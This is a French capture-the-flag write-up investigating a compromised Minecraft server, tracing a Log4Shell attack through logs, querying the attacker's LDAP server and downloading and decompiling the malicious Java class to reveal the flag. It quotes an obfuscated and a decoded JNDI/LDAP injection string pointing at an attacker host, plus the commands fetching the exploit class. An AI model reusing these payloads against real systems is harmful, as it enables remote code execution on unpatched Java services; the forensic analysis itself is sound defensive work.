# Piratecraft

## Description

Un service d'hébergement de serveurs de jeux fournit des VPS avec Minecraft préinstallé pour leurs clients. Certaines attaques ciblent les serveurs et les font tomber en panne. Vous êtes le nouvel administrateur système. Vous avez accès à un serveur attaqué. Détectez l'intrusion sur le serveur Minecraft et essayez de comprendre les actions malveillantes.

Lien:
- un environnement virtuel chez [Malice](https://malice.fr/).

## Solution 

On démarre l'environnement et on se connecte au serveur. L'applicatif semble être stockée dans les /home :

```console
# ls -lrta /home/craft/
total 3152
drwxr-xr-x  5 root root    4096 May  7  2022 ..
-rwxrwxr-x  1 app  app     1110 May  7  2022 LICENSE.md
-rwxrwxr-x  1 app  app       11 May  7  2022 eula.txt
-rwxrwxr-x  1 app  app      356 May  7  2022 start.sh
-rwxrwxr-x  1 app  app       61 May  7  2022 log.sh
-rwxrwxr-x  1 app  app        2 May  7  2022 banned-players.json
-rwxrwxr-x  1 app  app        2 May  7  2022 whitelist.json
-rwxrwxr-x  1 app  app        2 May  7  2022 ops.json
-rwxrwxr-x  1 app  app   670663 May  7  2022 CHANGELOG.md
-rwxrwxr-x  1 app  app        2 May  7  2022 banned-ips.json
-rwxrwxr-x  1 app  app     1037 May  7  2022 server.properties
drwxr-xr-x 12 app  app     4096 May  7  2022 world
drwxrwxr-x  6 app  app     4096 May  8  2022 web
drwxrwxr-x  5 app  app     4096 May 13 16:16 .
drwxr-xr-x  2 app  app     4096 Jun 20 17:00 logs
-rwxrwxr-x  1 app  app  2495016 Oct 25 16:37 usercache.json
```

On a aussi un deuxième home :
```console
root@malice:/home/app# ls -lrta /home/app/  
total 28
-rw-r--r-- 1 app  app   807 May  6  2022 .profile
-rw-r--r-- 1 app  app  3526 May  6  2022 .bashrc
-rw-r--r-- 1 app  app   220 May  6  2022 .bash_logout
drwxr-xr-x 5 root root 4096 May  7  2022 ..
-rwxrwxr-x 1 app  app   607 May  8  2022 .bash_history
drwxr-xr-x 3 app  app  4096 Oct 26 12:03 .local
drwxr-xr-x 3 app  app  4096 Oct 26 12:35 .
```

On regarde un peu l'historique shell :
```console
root@malice:/home/app# cat /home/app/.bash_history 
whoami
mkdir /home/craft
cd /home/craft/
ls -lthar
apt-get update -y
apt-get install -y openjdk-17-jdk openjdk-17-jre git zip screen wget nano openssh-server php7.4
https://launcher.mojang.com/v1/objects/0a269b5f2c5b93b1712d0f5dc43b6182b9ab254e/server.jar
mv server.jar minecraft_server.jar
nano /home/craft/start.sh
chmod -R 775 /home/craft/
screen -ls
/home/craft/start.sh minecraft "java -Xmx1024M -Xms1024M -jar /home/craft/minecraft_server.jar nogui &"
screen -R minecraft
cat /var/log/minecraft.log
ls -lthar
pwd
whoami
netstat -lentupac
rm minecraft_server.jar
```

Ça ressemble à un déploiement légitime de Minecraft. On regarde le log situé dans /var/log/minecraft.log et on remarque une entrée bizarre :

```
[16:39:33] [Server thread/INFO]: <unhappy> ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//unhappy.competitor.com:1389/a} 
```

Ça sent très fortement une exploitation de [Log4Shell](https://fr.wikipedia.org/wiki/Log4Shell) (dont Minecraft a effectivement été la victime, en tout cas la version Java). Traçons un peu plus cet utilisateur au niveau Minecraft :

```
root@malice:/home/app# grep unhappy /var/log/minecraft.log 
[16:39:32] [User Authenticator #10639/INFO]: UUID of player unhappy is a00b999e-001b-4807-b999-add902b9999c
[16:39:32] [Server thread/INFO]: unhappy[/172.240.18.1:57008] logged in with entity id 10991 at (-257.5, 67.0, -198.5)
[16:39:32] [Server thread/INFO]: unhappy joined the game
[16:39:33] [Server thread/INFO]: <unhappy> ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//unhappy.competitor.com:1389/a} 
[16:39:33] [Server thread/INFO]: <unhappy> Reference Class Name: foo 
[16:40:02] [Server thread/INFO]: unhappy lost connection: Disconnected
[16:40:02] [Server thread/INFO]: unhappy left the game
```

Et plus largement dans les logs système :

```
root@malice:/home/craft# grep -r unhappy /var/log
/var/log/user.log.1:May  8 02:02:55 malice ansible-replace: Invoked with path=/var/log/minecraft.log regexp=(unhappy\.competitor\.com:1389) replace=174.10.54.15:1389 backup=False encoding=utf-8 unsafe_writes=False after=None before=None validate=None mode=None owner=None group=None seuser=None serole=None selevel=None setype=None attributes=None
[répété plein de fois]
/var/log/user.log.1:May  8 03:26:16 malice ansible-replace: Invoked with path=/home/craft/logs/latest.log regexp=(unhappy\.competitor\.com:1389) replace=174.10.54.15:1389 backup=False encoding=utf-8 unsafe_writes=False after=None before=None validate=None mode=None owner=None group=None seuser=None serole=None selevel=None setype=None attributes=None
/var/log/minecraft.log:[16:39:32] [User Authenticator #10639/INFO]: UUID of player unhappy is a00b999e-001b-4807-b999-add902b9999c
/var/log/minecraft.log:[16:39:32] [Server thread/INFO]: unhappy[/172.240.18.1:57008] logged in with entity id 10991 at (-257.5, 67.0, -198.5)
/var/log/minecraft.log:[16:39:32] [Server thread/INFO]: unhappy joined the game
/var/log/minecraft.log:[16:39:33] [Server thread/INFO]: <unhappy> ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//unhappy.competitor.com:1389/a} 
/var/log/minecraft.log:[16:39:33] [Server thread/INFO]: <unhappy> Reference Class Name: foo 
/var/log/minecraft.log:[16:40:02] [Server thread/INFO]: unhappy lost connection: Disconnected
/var/log/minecraft.log:[16:40:02] [Server thread/INFO]: unhappy left the game
```

On voit les traces d'une exécution ansible qui remplace l'IP `174.10.54.15`  par le domaine `unhappy.competitor.com` un peu partout. On peut donc essayer de reconstruire l'attaque Log4shell.

On part de :

`${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//unhappy.competitor.com:1389/a}`

Les patterns `${k8s:k5:-<quelque chose>}` permettent d'obfusquer le `<quelque chose>`. Donc en réalité, on a :

`${JNDi:lDap://unhappy.competitor.com:1389/a}`

Et évidemment, le nom de domaine a remplacé l'IP :

`${JNDi:lDap://174.10.54.15:1389/a}`

Peut-on essayer d'interroger le serveur LDAP en question ?

```console
root@malice:/# ldapsearch -x -p 1389 -h 174.10.54.15 
# extended LDIF
#
# LDAPv3
# base <> (default) with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
javaClassName: foo
javaCodeBase: http://174.10.54.15:50666/
objectClass: javaNamingReference
javaFactory: Exploit84686564564857543

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
```

Oui ! Et donc il semble effectivement distribuer un exploit Log4Shell. On va le télécharger en concaténant les entrées `javaCodeBase` et `javaFactory` et en concaténant l'extension `.class` :


```console
# wget http://174.10.54.15:50666/Exploit84686564564857543.class
--2022-11-18 22:42:19--  http://174.10.54.15:50666/Exploit84686564564857543.class
Connecting to 174.10.54.15:50666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5067 (4.9K) [application/java-vm]
Saving to: 'Exploit84686564564857543.class'

Exploit84686564564857543.class             100%[=======================================================================================>]   4.95K  --.-KB/s    in 0s      

2022-11-18 22:42:19 (464 MB/s) - 'Exploit84686564564857543.class' saved [5067/5067]
```

On obtient le fichier [Exploit84686564564857543.class](Exploit84686564564857543.class), que l'on décompile pour obtenir son [code source](Exploit84686564564857543.java). Comme c'est un peu obfusqué, [on le modifie](Exploit.java) pour voir ce qui passe dans la socket. On lance et :

```console
$ javac Exploit.java  && java Exploit
###########################################
# - - - - -  WELCOME IN SHELL - - - - - - #
# - - ALL YOUR CUBES ARE BELONG TO US - - #
# -- $Hacked_by_unhappy.competitor.com -- #
# DGHACK{411_Y0Ur_CU835_4r3_8310N6_70_U5} #
###########################################
```